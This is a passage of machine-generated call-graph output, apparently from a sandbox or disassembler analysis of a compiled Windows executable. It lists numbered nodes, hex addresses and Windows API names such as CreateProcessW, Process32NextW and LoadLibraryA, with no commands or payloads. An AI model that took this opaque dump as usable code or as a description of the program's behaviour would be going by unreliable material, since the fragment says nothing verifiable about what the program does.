API calls 94101->94103 94108 676f34 22 API calls 94102->94108 94105 676bae 94103->94105 94107 68fe0b 22 API calls 94105->94107 94106 676b85 __fread_nolock 94106->94092 94107->94106 94108->94106 94110 6793c9 __fread_nolock 94109->94110 94111 6793c0 94109->94111 94110->94100 94111->94110 94113 67aec9 94111->94113 94114 67aedc 94113->94114 94118 67aed9 __fread_nolock 94113->94118 94115 68fddb 22 API calls 94114->94115 94116 67aee7 94115->94116 94117 68fe0b 22 API calls 94116->94117 94117->94118 94118->94110 94120 6fb01d ___scrt_fastfail 94119->94120 94121 6fb058 94120->94121 94122 6fb094 94120->94122 94123 67b567 39 API calls 94121->94123 94126 67b567 39 API calls 94122->94126 94127 6fb08b 94122->94127 94124 6fb063 94123->94124 94124->94127 94130 67b567 39 API calls 94124->94130 94125 6fb0ed 94128 677510 53 API calls 94125->94128 94129 6fb0a5 94126->94129 94127->94125 94131 67b567 39 API calls 94127->94131 94132 6fb10b 94128->94132 94133 67b567 39 API calls 94129->94133 94134 6fb078 94130->94134 94131->94125 94210 677620 94132->94210 94133->94127 94136 67b567 39 API calls 94134->94136 94136->94127 94137 6fb115 94138 6fb11f 94137->94138 94139 6fb1d8 94137->94139 94141 677510 53 API calls 94138->94141 94140 6fb20a GetCurrentDirectoryW 94139->94140 94144 677510 53 API calls 94139->94144 94142 68fe0b 22 API calls 94140->94142 94143 6fb130 94141->94143 94145 6fb22f GetCurrentDirectoryW 94142->94145 94146 677620 22 API calls 94143->94146 94147 6fb1ef 94144->94147 94148 6fb23c 94145->94148 94149 6fb13a 94146->94149 94150 677620 22 API calls 94147->94150 94157 6fb275 94148->94157 94217 679c6e 22 API calls 94148->94217 94151 677510 53 API calls 94149->94151 94158 6fb1f9 _wcslen 94150->94158 94152 6fb14b 94151->94152 94154 677620 22 API calls 94152->94154 94156 6fb155 94154->94156 94155 6fb255 94218 679c6e 22 API calls 94155->94218 94160 677510 53 API calls 94156->94160 94161 6fb28b 94157->94161 94162 6fb287 94157->94162 94158->94140 94158->94157 94164 6fb166 94160->94164 94220 6e07c0 10 API calls 94161->94220 94167 6fb39a CreateProcessW 94162->94167 94168 6fb2f8 94162->94168 94163 6fb265 94219 679c6e 22 API calls 94163->94219 94170 677620 22 API calls 94164->94170 94166 6fb294 94221 6e06e6 10 API calls 94166->94221 94209 6fb32f _wcslen 94167->94209 94223 6d11c8 39 API calls 94168->94223 94173 6fb170 94170->94173 94176 6fb1a6 GetSystemDirectoryW 94173->94176 94181 677510 53 API calls 94173->94181 94174 6fb2aa 94222 6e05a7 8 API calls 94174->94222 94175 6fb2fd 94179 6fb32a 94175->94179 94180 6fb323 94175->94180 94178 68fe0b 22 API calls 94176->94178 94183 6fb1cb GetSystemDirectoryW 94178->94183 94225 6d14ce 6 API calls 94179->94225 94224 6d1201 128 API calls 2 library calls 94180->94224 94185 6fb187 94181->94185 94182 6fb2d0 94182->94162 94183->94148 94188 677620 22 API calls 94185->94188 94187 6fb328 94187->94209 94191 6fb191 _wcslen 94188->94191 94189 6fb42f CloseHandle 94192 6fb43f 94189->94192 94200 6fb49a 94189->94200 94190 6fb3d6 GetLastError 94199 6fb41a 94190->94199 94191->94148 94191->94176 94193 6fb446 CloseHandle 94192->94193 94194 6fb451 94192->94194 94193->94194 94196 6fb458 CloseHandle 94194->94196 94197 6fb463 94194->94197 94196->94197 94201 6fb46a CloseHandle 94197->94201 94202 6fb475 94197->94202 94198 6fb4a6 94198->94199 94214 6e0175 94199->94214 94200->94198 94205 6fb4d2 CloseHandle 94200->94205 94201->94202 94226 6e09d9 34 API calls 94202->94226 94205->94199 94207 6fb486 94227 6fb536 25 API calls 94207->94227 94209->94189 94209->94190 94211 67762a _wcslen 94210->94211 94212 68fe0b 22 API calls 94211->94212 94213 67763f 94212->94213 94213->94137 94228 6e030f 94214->94228 94217->94155 94218->94163 94219->94157 94220->94166 94221->94174 94222->94182 94223->94175 94224->94187 94225->94209 94226->94207 94227->94200 94229 6e0329 94228->94229 94230 6e0321 CloseHandle 94228->94230 94231 6e032e CloseHandle 94229->94231 94232 6e0336 94229->94232 94230->94229 94231->94232 94233 6e033b CloseHandle 94232->94233 94234 6e0343 94232->94234 94233->94234 94235 6e0348 CloseHandle 94234->94235 94236 6e0350 94234->94236 94235->94236 94237 6e035d 94236->94237 94238 6e0355 CloseHandle 94236->94238 94239 6e017d 94237->94239 94240 6e0362 CloseHandle 94237->94240 94238->94237 94239->94042 94240->94239 94251 6ddef7 94241->94251 94243 6dd529 Process32NextW 94244 6dd5db CloseHandle 94243->94244 94248 6dd522 94243->94248 94244->94048 94245 67a961 22 API calls 94245->94248 94246 679cb3 22 API calls 94246->94248 94248->94243 94248->94244 94248->94245 94248->94246 94257 67525f 22 API calls 94248->94257 94258 676350 22 API calls 94248->94258 94259 68ce60 41 API calls 94248->94259 94252 6ddf02 94251->94252 94253 6ddf19 94252->94253 94256 6ddf1f 94252->94256 94260 6963b2 GetStringTypeW _strftime 94252->94260 94261 6962fb 39 API calls 94253->94261 94256->94248 94257->94248 94258->94248 94259->94248 94260->94252 94261->94256 94263 67ae01 94262->94263 94266 67ae1c ISource 94262->94266 94264 67aec9 22 API calls 94263->94264 94265 67ae09 CharUpperBuffW 94264->94265 94265->94266 94266->93896 94268 67acae 94267->94268 94269 67acd1 94268->94269 94295 6e359c 82 API calls __wsopen_s 94268->94295 94269->93946 94272 6bfadb 94271->94272 94273 67ad92 94271->94273 94274 68fddb 22 API calls 94273->94274 94275 67ad99 94274->94275 94296 67adcd 94275->94296 94278->93939 94279->93939 94280->93900 94281->93951 94282->93915 94283->93951 94284->93951 94285->93946 94286->93946 94287->93946 94288->93946 94289->93946 94290->93927 94291->93951 94292->93934 94293->93936 94294->93951 94295->94269 94300 67addd 94296->94300 94297 67adb6 94297->93946 94298 68fddb 22 API calls 94298->94300 94300->94297 94300->94298 94302 67adcd 22 API calls 94300->94302 94303 67a961 94300->94303 94308 67a8c7 22 API calls __fread_nolock 94300->94308 94302->94300 94304 68fe0b 22 API calls 94303->94304 94305 67a976 94304->94305 94306 68fddb 22 API calls 94305->94306 94307 67a984 94306->94307 94307->94300 94308->94300 94309->93962 94310->93962 94311->93959 94312->93965 94313->93743 94314->93743 95271 671044 95276 6710f3 95271->95276 95273 67104a 95312 6900a3 29 API calls __onexit 95273->95312 95275 671054 95313 671398 95276->95313 95280 67116a 95281 67a961 22 API calls 95280->95281 95282 671174 95281->95282 95283 67a961 22 API calls 95282->95283 95284 67117e 95283->95284 95285 67a961 22 API calls 95284->95285 95286 671188 95285->95286 95287 67a961 22 API calls 95286->95287 95288 6711c6 95287->95288 95289 67a961 22 API calls 95288->95289 95290 671292 95289->95290 95323 67171c 95290->95323 95294 6712c4 95295 67a961 22 API calls 95294->95295 95296 6712ce 95295->95296 95297 681940 9 API calls 95296->95297 95298 6712f9 95297->95298 95344 671aab 95298->95344 95300 671315 95301 671325 GetStdHandle 95300->95301 95302 67137a 95301->95302 95303 6b2485 95301->95303 95306 671387 OleInitialize 95302->95306 95303->95302 95304 6b248e 95303->95304 95305 68fddb 22 API calls 95304->95305 95307 6b2495 95305->95307 95306->95273 95351 6e011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 95307->95351 95309 6b249e 95352 6e0944 CreateThread 95309->95352 95311 6b24aa CloseHandle 95311->95302 95312->95275 95353 6713f1 95313->95353 95316 6713f1 22 API calls 95317 6713d0 95316->95317 95318 67a961 22 API calls 95317->95318 95319 6713dc 95318->95319 95320 676b57 22 API calls 95319->95320 95321 671129 95320->95321 95322 671bc3 6 API calls 95321->95322 95322->95280 95324 67a961 22 API calls 95323->95324 95325 67172c 95324->95325 95326 67a961 22 API calls 95325->95326 95327 671734 95326->95327 95328 67a961 22 API calls 95327->95328 95329 67174f 95328->95329 95330 68fddb 22 API calls 95329->95330 95331 67129c 95330->95331 95332 671b4a 95331->95332 95333 671b58 95332->95333 95334 67a961 22 API calls 95333->95334 95335 671b63 95334->95335 95336 67a961 22 API calls 95335->95336 95337 671b6e 95336->95337 95338 67a961 22 API calls 95337->95338 95339 671b79 95338->95339 95340 67a961 22 API calls 95339->95340 95341 671b84 95340->95341 95342 68fddb 22 API calls 95341->95342 95343 671b96 RegisterWindowMessageW 95342->95343 95343->95294 95345 6b272d 95344->95345 95346 671abb 95344->95346 95360 6e3209 23 API calls 95345->95360 95347 68fddb 22 API calls 95346->95347 95349 671ac3 95347->95349 95349->95300 95350 6b2738 95351->95309 95352->95311 95361 6e092a 28 API calls 95352->95361 95354 67a961 22 API calls 95353->95354 95355 6713fc 95354->95355 95356 67a961 22 API calls 95355->95356 95357 671404 95356->95357 95358 67a961 22 API calls 95357->95358 95359 6713c6 95358->95359 95359->95316 95360->95350 94315 672de3 94316 672df0 __wsopen_s 94315->94316 94317 672e09 94316->94317 94319 6b2c2b ___scrt_fastfail 94316->94319 94331 673aa2 94317->94331 94320 6b2c47 GetOpenFileNameW 94319->94320 94322 6b2c96 94320->94322 94324 676b57 22 API calls 94322->94324 94326 6b2cab 94324->94326 94326->94326 94328 672e27 94359 6744a8 94328->94359 94389 6b1f50 94331->94389 94334 673ace 94336 676b57 22 API calls 94334->94336 94335 673ae9 94395 67a6c3 94335->94395 94338 673ada 94336->94338 94391 6737a0 94338->94391 94341 672da5 94342 6b1f50 __wsopen_s 94341->94342 94343 672db2 GetLongPathNameW 94342->94343 94344 676b57 22 API calls 94343->94344 94345 672dda 94344->94345 94346 673598 94345->94346 94347 67a961 22 API calls 94346->94347 94348 6735aa 94347->94348 94349 673aa2 23 API calls 94348->94349 94350 6735b5 94349->94350 94351 6b32eb 94350->94351 94352 6735c0 94350->94352 94357 6b330d 94351->94357 94413 68ce60 41 API calls 94351->94413 94401 67515f 94352->94401 94358 6735df 94358->94328 94414 674ecb 94359->94414 94362 6b3833 94436 6e2cf9 94362->94436 94363 674ecb 94 API calls 94365 6744e1 94363->94365 94365->94362 94367 6744e9 94365->94367 94366 6b3848 94368 6b3869 94366->94368 94369 6b384c 94366->94369 94371 6744f5 94367->94371 94372 6b3854 94367->94372 94370 68fe0b 22 API calls 94368->94370 94477 674f39 94369->94477 94388 6b38ae 94370->94388 94476 67940c 136 API calls 2 library calls 94371->94476 94483 6dda5a 82 API calls 94372->94483 94376 6b3862 94376->94368 94377 672e31 94378 6b3a5f 94383 6b3a67 94378->94383 94379 674f39 68 API calls 94379->94383 94383->94379 94487 6d989b 82 API calls __wsopen_s 94383->94487 94385 679cb3 22 API calls 94385->94388 94388->94378 94388->94383 94388->94385 94462 67a4a1 94388->94462 94470 673ff7 94388->94470 94484 6d967e 22 API calls __fread_nolock 94388->94484 94485 6d95ad 42 API calls _wcslen 94388->94485 94486 6e0b5a 22 API calls 94388->94486 94390 673aaf GetFullPathNameW 94389->94390 94390->94334 94390->94335 94392 6737ae 94391->94392 94393 6793b2 22 API calls 94392->94393 94394 672e12 94393->94394 94394->94341 94396 67a6dd 94395->94396 94400 67a6d0 94395->94400 94397 68fddb 22 API calls 94396->94397 94398 67a6e7 94397->94398 94399 68fe0b 22 API calls 94398->94399 94399->94400 94400->94338 94402 67516e 94401->94402 94406 67518f __fread_nolock 94401->94406 94405 68fe0b 22 API calls 94402->94405 94403 68fddb 22 API calls 94404 6735cc 94403->94404 94407 6735f3 94404->94407 94405->94406 94406->94403 94408 673605 94407->94408 94412 673624 __fread_nolock 94407->94412 94410 68fe0b 22 API calls 94408->94410 94409 68fddb 22 API calls 94411 67363b 94409->94411 94410->94412 94411->94358 94412->94409 94413->94351 94488 674e90 LoadLibraryA 94414->94488 94419 674ef6 LoadLibraryExW 94496 674e59 LoadLibraryA 94419->94496 94420 6b3ccf 94421 674f39 68 API calls 94420->94421 94424 6b3cd6 94421->94424 94426 674e59 3 API calls 94424->94426 94428 6b3cde 94426->94428 94427 674f20 94427->94428 94429 674f2c 94427->94429 94518 6750f5 94428->94518 94430 674f39 68 API calls 94429->94430 94432 6744cd 94430->94432 94432->94362 94432->94363 94435 6b3d05 94437 6e2d15 94436->94437 94438 67511f 64 API calls 94437->94438 94439 6e2d29 94438->94439 94661 6e2e66 94439->94661 94442 6750f5 40 API calls 94443 6e2d56 94442->94443 94444 6750f5 40 API calls 94443->94444 94445 6e2d66 94444->94445 94446 6750f5 40 API calls 94445->94446 94447 6e2d81 94446->94447 94448 6750f5 40 API calls 94447->94448 94449 6e2d9c 94448->94449 94450 67511f 64 API calls 94449->94450 94451 6e2db3 94450->94451 94452 69ea0c ___std_exception_copy 21 API calls 94451->94452 94453 6e2dba 94452->94453 94454 69ea0c ___std_exception_copy 21 API calls 94453->94454 94455 6e2dc4 94454->94455 94456 6750f5 40 API calls 94455->94456 94457 6e2dd8 94456->94457 94458 6e28fe 27 API calls 94457->94458 94460 6e2dee 94458->94460 94459 6e2d3f 94459->94366 94460->94459 94667 6e22ce 79 API calls 94460->94667 94463 67a4b1 __fread_nolock 94462->94463 94464 67a52b 94462->94464 94465 68fddb 22 API calls 94463->94465 94466 68fe0b 22 API calls 94464->94466 94467 67a4b8 94465->94467 94466->94463 94468 68fddb 22 API calls 94467->94468 94469 67a4d6 94467->94469 94468->94469 94469->94388 94471 67400a 94470->94471 94474 6740ae 94470->94474 94472 68fe0b 22 API calls 94471->94472 94475 67403c 94471->94475 94472->94475 94473 68fddb 22 API calls 94473->94475 94474->94388 94475->94473 94475->94474 94476->94377 94478 674f43 94477->94478 94479 674f4a 94477->94479 94668 69e678 94478->94668 94481 674f6a FreeLibrary 94479->94481 94482 674f59 94479->94482 94481->94482 94482->94372 94483->94376 94484->94388 94485->94388 94486->94388 94487->94383 94489 674ec6 94488->94489 94490 674ea8 GetProcAddress 94488->94490 94493 69e5eb 94489->94493 94491 674eb8 94490->94491 94491->94489 94492 674ebf FreeLibrary 94491->94492 94492->94489 94526 69e52a 94493->94526 94495 674eea 94495->94419 94495->94420 94497 674e6e GetProcAddress 94496->94497 94498 674e8d 94496->94498 94499 674e7e 94497->94499 94501 674f80 94498->94501 94499->94498 94500 674e86 FreeLibrary 94499->94500 94500->94498 94502 68fe0b 22 API calls 94501->94502 94503 674f95 94502->94503 94587 675722 94503->94587 94505 674fa1 __fread_nolock 94506 674fdc 94505->94506 94507 6750a5 94505->94507 94508 6b3d1d 94505->94508 94511 6b3d22 94506->94511 94512 6750f5 40 API calls 94506->94512 94517 67506e ISource 94506->94517 94596 67511f 94506->94596 94590 6742a2 CreateStreamOnHGlobal 94507->94590 94601 6e304d 74 API calls 94508->94601 94513 67511f 64 API calls 94511->94513 94512->94506 94514 6b3d45 94513->94514 94515 6750f5 40 API calls 94514->94515 94515->94517 94517->94427 94519 675107 94518->94519 94520 6b3d70 94518->94520 94623 69e8c4 94519->94623 94523 6e28fe 94644 6e274e 94523->94644 94525 6e2919 94525->94435 94529 69e536 ___DestructExceptionObject 94526->94529 94527 69e544 94551 69f2d9 20 API calls __dosmaperr 94527->94551 94529->94527 94531 69e574 94529->94531 94530 69e549 94552 6a27ec 26 API calls __wsopen_s 94530->94552 94533 69e579 94531->94533 94534 69e586 94531->94534 94553 69f2d9 20 API calls __dosmaperr 94533->94553 94543 6a8061 94534->94543 94537 69e58f 94538 69e5a2 94537->94538 94539 69e595 94537->94539 94555 69e5d4 LeaveCriticalSection __fread_nolock 94538->94555 94554 69f2d9 20 API calls __dosmaperr 94539->94554 94541 69e554 __wsopen_s 94541->94495 94544 6a806d ___DestructExceptionObject 94543->94544 94556 6a2f5e EnterCriticalSection 94544->94556 94546 6a807b 94557 6a80fb 94546->94557 94550 6a80ac __wsopen_s 94550->94537 94551->94530 94552->94541 94553->94541 94554->94541 94555->94541 94556->94546 94558 6a811e 94557->94558 94559 6a8177 94558->94559 94566 6a8088 94558->94566 94574 69918d EnterCriticalSection 94558->94574 94575 6991a1 LeaveCriticalSection 94558->94575 94576 6a4c7d 20 API calls __dosmaperr 94559->94576 94561 6a8180 94577 6a29c8 94561->94577 94564 6a8189 94564->94566 94583 6a3405 11 API calls 2 library calls 94564->94583 94571 6a80b7 94566->94571 94567 6a81a8 94584 69918d EnterCriticalSection 94567->94584 94570 6a81bb 94570->94566 94586 6a2fa6 LeaveCriticalSection 94571->94586 94573 6a80be 94573->94550 94574->94558 94575->94558 94576->94561 94578 6a29d3 RtlFreeHeap 94577->94578 94582 6a29fc __dosmaperr 94577->94582 94579 6a29e8 94578->94579 94578->94582 94585 69f2d9 20 API calls __dosmaperr 94579->94585 94581 6a29ee GetLastError 94581->94582 94582->94564 94583->94567 94584->94570 94585->94581 94586->94573 94588 68fddb 22 API calls 94587->94588 94589 675734 94588->94589 94589->94505 94591 6742bc FindResourceExW 94590->94591 94595 6742d9 94590->94595 94592 6b35ba LoadResource 94591->94592 94591->94595 94593 6b35cf SizeofResource 94592->94593 94592->94595 94594 6b35e3 LockResource 94593->94594 94593->94595 94594->94595 94595->94506 94597 67512e 94596->94597 94598 6b3d90 94596->94598 94602 69ece3 94597->94602 94601->94511 94605 69eaaa 94602->94605 94604 67513c 94604->94506 94609 69eab6 ___DestructExceptionObject 94605->94609 94606 69eac2 94618 69f2d9 20 API calls __dosmaperr 94606->94618 94608 69eae8 94620 69918d EnterCriticalSection 94608->94620 94609->94606 94609->94608 94611 69eac7 94619 6a27ec 26 API calls __wsopen_s 94611->94619 94612 69eaf4 94621 69ec0a 62 API calls 2 library calls 94612->94621 94615 69eb08 94622 69eb27 LeaveCriticalSection __fread_nolock 94615->94622 94617 69ead2 __wsopen_s 94617->94604 94618->94611 94619->94617 94620->94612 94621->94615 94622->94617 94626 69e8e1 94623->94626 94625 675118 94625->94523 94627 69e8ed ___DestructExceptionObject 94626->94627 94628 69e92d 94627->94628 94629 69e900 ___scrt_fastfail 94627->94629 94630 69e925 __wsopen_s 94627->94630 94641 69918d EnterCriticalSection 94628->94641 94639 69f2d9 20 API calls __dosmaperr 94629->94639 94630->94625 94632 69e937 94642 69e6f8 38 API calls 4 library calls 94632->94642 94635 69e91a 94640 6a27ec 26 API calls __wsopen_s 94635->94640 94637 69e94e 94643 69e96c LeaveCriticalSection __fread_nolock 94637->94643 94639->94635 94640->94630 94641->94632 94642->94637 94643->94630 94647 69e4e8 94644->94647 94646 6e275d 94646->94525 94650 69e469 94647->94650 94649 69e505 94649->94646 94651 69e478 94650->94651 94652 69e48c 94650->94652 94658 69f2d9 20 API calls __dosmaperr 94651->94658 94657 69e488 __alldvrm 94652->94657 94660 6a333f 11 API calls 2 library calls 94652->94660 94654 69e47d 94659 6a27ec 26 API calls __wsopen_s 94654->94659 94657->94649 94658->94654 94659->94657 94660->94657 94663 6e2e7a 94661->94663 94662 6750f5 40 API calls 94662->94663 94663->94662 94664 6e28fe 27 API calls 94663->94664 94665 6e2d3b 94663->94665 94666 67511f 64 API calls 94663->94666 94664->94663 94665->94442 94665->94459 94666->94663 94667->94459 94669 69e684 ___DestructExceptionObject 94668->94669 94670 69e6aa 94669->94670 94671 69e695 94669->94671 94680 69e6a5 __wsopen_s 94670->94680 94683 69918d EnterCriticalSection 94670->94683 94681 69f2d9 20 API calls __dosmaperr 94671->94681 94674 69e69a 94682 6a27ec 26 API calls __wsopen_s 94674->94682 94675 69e6c6 94684 69e602 94675->94684 94678 69e6d1 94700 69e6ee LeaveCriticalSection __fread_nolock 94678->94700 94680->94479 94681->94674 94682->94680 94683->94675 94685 69e60f 94684->94685 94686 69e624 94684->94686 94701 69f2d9 20 API calls __dosmaperr 94685->94701 94698 69e61f 94686->94698 94703 69dc0b 94686->94703 94688 69e614 94702 6a27ec 26 API calls __wsopen_s 94688->94702 94695 69e646 94720 6a862f 94695->94720 94698->94678 94699 6a29c8 _free 20 API calls 94699->94698 94700->94680 94701->94688 94702->94698 94704 69dc1f 94703->94704 94705 69dc23 94703->94705 94709 6a4d7a 94704->94709 94705->94704 94706 69d955 __fread_nolock 26 API calls 94705->94706 94707 69dc43 94706->94707 94735 6a59be 62 API calls 3 library calls 94707->94735 94710 6a4d90 94709->94710 94711 69e640 94709->94711 94710->94711 94712 6a29c8 _free 20 API calls 94710->94712 94713 69d955 94711->94713 94712->94711 94714 69d961 94713->94714 94715 69d976 94713->94715 94736 69f2d9 20 API calls __dosmaperr 94714->94736 94715->94695 94717 69d966 94737 6a27ec 26 API calls __wsopen_s 94717->94737 94719 69d971 94719->94695 94721 6a863e 94720->94721 94725 6a8653 94720->94725 94738 69f2c6 20 API calls __dosmaperr 94721->94738 94723 6a868e 94743 69f2c6 20 API calls __dosmaperr 94723->94743 94724 6a8643 94739 69f2d9 20 API calls __dosmaperr 94724->94739 94725->94723 94728 6a867a 94725->94728 94740 6a8607 94728->94740 94729 6a8693 94744 69f2d9 20 API calls __dosmaperr 94729->94744 94732 69e64c 94732->94698 94732->94699 94733 6a869b 94745 6a27ec 26 API calls __wsopen_s 94733->94745 94735->94704 94736->94717 94737->94719 94738->94724 94739->94732 94746 6a8585 94740->94746 94742 6a862b 94742->94732 94743->94729 94744->94733 94745->94732 94747 6a8591 ___DestructExceptionObject 94746->94747 94757 6a5147 EnterCriticalSection 94747->94757 94749 6a859f 94750 6a85d1 94749->94750 94751 6a85c6 94749->94751 94773 69f2d9 20 API calls __dosmaperr 94750->94773 94758 6a86ae 94751->94758 94754 6a85cc 94774 6a85fb LeaveCriticalSection __wsopen_s 94754->94774 94756 6a85ee __wsopen_s 94756->94742 94757->94749 94775 6a53c4 94758->94775 94760 6a86c4 94788 6a5333 21 API calls 2 library calls 94760->94788 94761 6a86be 94761->94760 94763 6a53c4 __wsopen_s 26 API calls 94761->94763 94772 6a86f6 94761->94772 94766 6a86ed 94763->94766 94764 6a53c4 __wsopen_s 26 API calls 94767 6a8702 CloseHandle 94764->94767 94765 6a871c 94768 6a873e 94765->94768 94789 69f2a3 20 API calls __dosmaperr 94765->94789 94769 6a53c4 __wsopen_s 26 API calls 94766->94769 94767->94760 94770 6a870e GetLastError 94767->94770 94768->94754 94769->94772 94770->94760 94772->94760 94772->94764 94773->94754 94774->94756 94776 6a53d1 94775->94776 94777 6a53e6 94775->94777 94790 69f2c6 20 API calls __dosmaperr 94776->94790 94782 6a540b 94777->94782 94792 69f2c6 20 API calls __dosmaperr 94777->94792 94779 6a53d6 94791 69f2d9 20 API calls __dosmaperr 94779->94791 94782->94761 94783 6a5416 94793 69f2d9 20 API calls __dosmaperr 94783->94793 94784 6a53de 94784->94761 94786 6a541e 94794 6a27ec 26 API calls __wsopen_s 94786->94794 94788->94765 94789->94768 94790->94779 94791->94784 94792->94783 94793->94786 94794->94784 95362 702a55 95370 6e1ebc 95362->95370 95365 702a70 95372 6d39c0 22 API calls 95365->95372 95366 702a87 95368 702a7c 95373 6d417d 22 API calls __fread_nolock 95368->95373 95371 6e1ec3 IsWindow 95370->95371 95371->95365 95371->95366 95372->95368 95373->95366 95374 6a8402 95379 6a81be 95374->95379 95377 6a842a 95384 6a81ef try_get_first_available_module 95379->95384 95381 6a83ee 95398 6a27ec 26 API calls __wsopen_s 95381->95398 95383 6a8343 95383->95377 95391 6b0984 95383->95391 95387 6a8338 95384->95387 95394 698e0b 40 API calls 2 library calls 95384->95394 95386 6a838c 95386->95387 95395 698e0b 40 API calls 2 library calls 95386->95395 95387->95383 95397 69f2d9 20 API calls __dosmaperr 95387->95397 95389 6a83ab 95389->95387 95396 698e0b 40 API calls 2 library calls 95389->95396 95399 6b0081 95391->95399 95393 6b099f 95393->95377 95394->95386 95395->95389 95396->95387 95397->95381 95398->95383 95402 6b008d ___DestructExceptionObject 95399->95402 95400 6b009b 95456 69f2d9 20 API calls __dosmaperr 95400->95456 95402->95400 95404 6b00d4 95402->95404 95403 6b00a0 95457 6a27ec 26 API calls __wsopen_s 95403->95457 95410 6b065b 95404->95410 95409 6b00aa __wsopen_s 95409->95393 95411 6b0678 95410->95411 95412 6b068d 95411->95412 95413 6b06a6 95411->95413 95473 69f2c6 20 API calls __dosmaperr 95412->95473 95459 6a5221 95413->95459 95416 6b06ab 95417 6b06cb 95416->95417 95418 6b06b4 95416->95418 95472 6b039a CreateFileW 95417->95472 95475 69f2c6 20 API calls __dosmaperr 95418->95475 95422 6b06b9 95476 69f2d9 20 API calls __dosmaperr 95422->95476 95424 6b0781 GetFileType 95425 6b078c GetLastError 95424->95425 95426 6b07d3 95424->95426 95479 69f2a3 20 API calls __dosmaperr 95425->95479 95481 6a516a 21 API calls 2 library calls 95426->95481 95427 6b0692 95474 69f2d9 20 API calls __dosmaperr 95427->95474 95428 6b0704 95428->95424 95429 6b0756 GetLastError 95428->95429 95477 6b039a CreateFileW 95428->95477 95478 69f2a3 20 API calls __dosmaperr 95429->95478 95432 6b079a CloseHandle 95432->95427 95434 6b07c3 95432->95434 95480 69f2d9 20 API calls __dosmaperr 95434->95480 95436 6b0749 95436->95424 95436->95429 95438 6b07f4 95439 6b0840 95438->95439 95482 6b05ab 72 API calls 3 library calls 95438->95482 95444 6b086d 95439->95444 95483 6b014d 72 API calls 4 library calls 95439->95483 95440 6b07c8 95440->95427 95443 6b0866 95443->95444 95445 6b087e 95443->95445 95446 6a86ae __wsopen_s 29 API calls 95444->95446 95447 6b00f8 95445->95447 95448 6b08fc CloseHandle 95445->95448 95446->95447 95458 6b0121 LeaveCriticalSection __wsopen_s 95447->95458 95484 6b039a CreateFileW 95448->95484 95450 6b0927 95451 6b095d 95450->95451 95452 6b0931 GetLastError 95450->95452 95451->95447 95485 69f2a3 20 API calls __dosmaperr 95452->95485 95454 6b093d 95486 6a5333 21 API calls 2 library calls 95454->95486 95456->95403 95457->95409 95458->95409 95460 6a522d ___DestructExceptionObject 95459->95460 95487 6a2f5e EnterCriticalSection 95460->95487 95462 6a527b 95488 6a532a 95462->95488 95464 6a5259 95491 6a5000 21 API calls 3 library calls 95464->95491 95465 6a52a4 __wsopen_s 95465->95416 95467 6a5234 95467->95462 95467->95464 95469 6a52c7 EnterCriticalSection 95467->95469 95468 6a525e 95468->95462 95492 6a5147 EnterCriticalSection 95468->95492 95469->95462 95470 6a52d4 LeaveCriticalSection 95469->95470 95470->95467 95472->95428 95473->95427 95474->95447 95475->95422 95476->95427 95477->95436 95478->95427 95479->95432 95480->95440 95481->95438 95482->95439 95483->95443 95484->95450 95485->95454 95486->95451 95487->95467 95493 6a2fa6 LeaveCriticalSection 95488->95493 95490 6a5331 95490->95465 95491->95468 95492->95462 95493->95490 95494 6b2402 95497 671410 95494->95497 95498 6b24b8 DestroyWindow 95497->95498 95499 67144f mciSendStringW 95497->95499 95511 6b24c4 95498->95511 95500 6716c6 95499->95500 95501 67146b 95499->95501 95500->95501 95503 6716d5 UnregisterHotKey 95500->95503 95502 671479 95501->95502 95501->95511 95530 67182e 95502->95530 95503->95500 95505 6b24d8 95505->95511 95536 676246 CloseHandle 95505->95536 95506 6b24e2 FindClose 95506->95511 95508 6b2509 95512 6b252d 95508->95512 95513 6b251c FreeLibrary 95508->95513 95510 67148e 95510->95512 95518 67149c 95510->95518 95511->95505 95511->95506 95511->95508 95514 6b2541 VirtualFree 95512->95514 95519 671509 95512->95519 95513->95508 95514->95512 95515 6714f8 CoUninitialize 95515->95519 95516 6b2589 95522 6b2598 ISource 95516->95522 95537 6e32eb 6 API calls ISource 95516->95537 95518->95515 95519->95516 95520 671514 95519->95520 95534 671944 VirtualFreeEx CloseHandle 95520->95534 95526 6b2627 95522->95526 95538 6d64d4 22 API calls ISource 95522->95538 95523 67153a 95523->95522 95525 67161f 95523->95525 95525->95526 95527 67166d 95525->95527 95527->95526 95535 671876 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 95527->95535 95529 6716c1 95531 67183b 95530->95531 95532 671480 95531->95532 95539 6d702a 22 API calls 95531->95539 95532->95508 95532->95510 95534->95523 95535->95529 95536->95505 95537->95516 95538->95522 95539->95531 94795 671cad SystemParametersInfoW 95540 6c2a00 95555 67d7b0 ISource 95540->95555 95541 67db11 PeekMessageW 95541->95555 95542 67d807 GetInputState 95542->95541 95542->95555 95543 6c1cbe TranslateAcceleratorW 95543->95555 95545 67db73 TranslateMessage DispatchMessageW 95546 67db8f PeekMessageW 95545->95546 95546->95555 95547 67da04 timeGetTime 95547->95555 95548 67dbaf Sleep 95548->95555 95549 6c2b74 Sleep 95562 6c2a51 95549->95562 95551 6c1dda timeGetTime 95608 68e300 23 API calls 95551->95608 95553 6dd4dc 47 API calls 95553->95562 95555->95541 95555->95542 95555->95543 95555->95545 95555->95546 95555->95547 95555->95548 95555->95549 95555->95551 95558 67d9d5 95555->95558 95555->95562 95568 67ec40 348 API calls 95555->95568 95569 67bf40 348 API calls 95555->95569 95570 681310 348 API calls 95555->95570 95572 67dd50 95555->95572 95579 67dfd0 95555->95579 95602 68edf6 95555->95602 95607 68e551 timeGetTime 95555->95607 95609 6e3a2a 23 API calls 95555->95609 95610 6e359c 82 API calls __wsopen_s 95555->95610 95556 6c2c0b GetExitCodeProcess 95560 6c2c37 CloseHandle 95556->95560 95561 6c2c21 WaitForSingleObject 95556->95561 95557 7029bf GetForegroundWindow 95557->95562 95560->95562 95561->95555 95561->95560 95562->95553 95562->95555 95562->95556 95562->95557 95562->95558 95563 6c2ca9 Sleep 95562->95563 95611 6f5658 23 API calls 95562->95611 95612 6de97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95562->95612 95613 68e551 timeGetTime 95562->95613 95563->95555 95568->95555 95569->95555 95570->95555 95573 67dd6f 95572->95573 95575 67dd83 95572->95575 95614 67d260 95573->95614 95646 6e359c 82 API calls __wsopen_s 95575->95646 95576 67dd7a 95576->95555 95578 6c2f75 95578->95578 95580 67e010 95579->95580 95595 67e0dc ISource 95580->95595 95656 690242 5 API calls __Init_thread_wait 95580->95656 95583 